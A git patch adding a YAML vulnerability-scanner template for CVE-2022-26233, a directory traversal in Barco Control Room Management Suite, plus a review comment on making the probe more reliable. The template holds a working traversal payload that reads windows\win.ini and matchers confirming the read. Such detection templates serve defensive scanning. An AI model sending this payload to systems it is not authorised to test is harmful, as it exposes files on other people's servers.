From 67b4c3b0aa83af5b02b4729a00786e78a65135d7 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Thu, 5 May 2022 10:55:44 +0900
Subject: [PATCH] Create CVE-2022-26233.yaml
---
CVE-2022-26233.yaml | 31 +++++++++++++++++++++++++++++++
1 file changed, 31 insertions(+)
create mode 100644 CVE-2022-26233.yaml
diff --git a/CVE-2022-26233.yaml b/CVE-2022-26233.yaml
new file mode 100644
index 0000000000..05f00cd433
--- /dev/null
+++ b/CVE-2022-26233.yaml
@@ -0,0 +1,31 @@
+id: CVE-2022-26233
+
+info:
+ name: Barco Control Room Management Suite - Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
+ reference:
+ - https://0day.today/exploit/37579
+ - https://www.cvedetails.com/cve/CVE-2022-26233
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2022-26233
+ cwe-id: CWE-22
+ tags: cve,cve2022,barco,lfi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/..\..\..\..\..\..\..\..\..\..\windows\win.ini'
+
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
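Review bot: The probe under `requests:` is sent through `path:` with `{{BaseURL}}`, while the description says a request must begin with the literal `GET /..\..` substring, so the check depends on the HTTP client leaving the backslash segments unnormalized and unencoded; if the client rewrites them, the template reports nothing and a vulnerable host is missed. It is worth confirming the bytes actually sent, and if they differ, pinning the request line with a `raw:` request and `unsafe: true`. `stop-at-first-match: true` has no effect with a single path and can be dropped. The matcher relies on body words alone; adding a `status` matcher for 200 under `matchers-condition: and` would tighten it, assuming the server answers 200 when the file is returned.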